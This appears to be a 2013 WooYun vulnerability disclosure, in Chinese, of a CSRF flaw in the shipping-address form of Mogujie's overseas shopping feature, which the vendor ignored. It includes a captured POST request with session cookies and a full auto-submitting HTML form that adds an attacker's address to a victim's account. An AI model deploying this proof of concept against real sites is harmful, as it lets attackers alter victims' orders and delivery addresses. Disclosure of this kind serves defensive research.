当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037314

漏洞标题:蘑菇街海购一处csrf漏洞

相关厂商:蘑菇街

漏洞作者: 小龙

提交时间:2013-09-17 17:51

修复时间:2013-09-22 17:52

公开时间:2013-09-22 17:52

漏洞类型:CSRF

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-17: 细节已通知厂商并且等待厂商处理中
2013-09-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

海购是刚出的吧。。

详细说明:

http://www.mogujie.com/trade/generateorder/account#
那个收货地址可以csrf
看下抓包:

POST /trade/address/addfororder HTTP/1.1
Host: www.mogujie.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.mogujie.com/trade/generateorder/account
Content-Length: 129
Cookie: __mgjuuid=6a9f438c-07de-94d4-89cc-8da820a18675; __utma=1.929626222.1376459895.1379250882.1379322905.9; __utmz=1.1379051230.6.2.utmcsr=gouwu.hao123.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=1.|1=fromReferer=openapi.qzone.qq.com=1^2=fromSite=zn20130905qztry=1; __ud_=11ox9v6; __mogujie=D5nWI6qu62OGg3QhuZxp%2BsCZ9mNbzly38Q4aRkl%2FcEka4atLYFABD6lc4y7YnbnzrFy1JFpsTSaVWOzHr38MXw%3D%3D; from_site=openapi.qzone.qq.com%5Ezn20130905qztry; Hm_lvt_44eae355b7e89129b1dc8d5c3328450d=1378351595,1379051604; __areaid=5; bdshare_firstime=1378351777827; __pk_=HYmfHKmQg0Up8%2FQ7R6kbtJSdwYFR8pZUV%2B8DMzLC64lb8g; __mogujiettcc=1; __utmb=1.32.10.1379322905; __utmc=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
addressId=&orderId=&province=110000&city=110100&area=110101&postcode=123456&street=1&name=1&mobile=13005264094&addressen=&nameen=


修改下就可以了,我们新建个1.html写:

<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><body>
<form name="csrf" action="http://www.mogujie.com/trade/address/addfororder" method="POST">
<input type=text name=addressId value=""></input>
<input type=text name=orderId value=""></input>
<input type=text name=province value="110000"></input>
<input type=text name=city value="110100"></input>
<input type=text name=area value="110101"></input>
<input type=text name=postcode value="123456"></input>
<input type=text name=street value="hacksb"></input>
<input type=text name=name value="hacksb"></input>
<input type=text name=mobile value="13800138000"></input>
<input type=text name=addressen value=""></input>
<input type=text name=nameen value=""></input>
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>


在主站那个收货地址被和谐了,哪里构造好访问什么都没,我就想起来了,购物中心,他们不是出了个海购? yes 我们开始把。

漏洞证明:

csrf.png

修复方案:

润哥你懂得。。。 再来一发礼物- -

版权声明:转载请注明来源 小龙@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-22 17:52

厂商回复:

最新状态:

暂无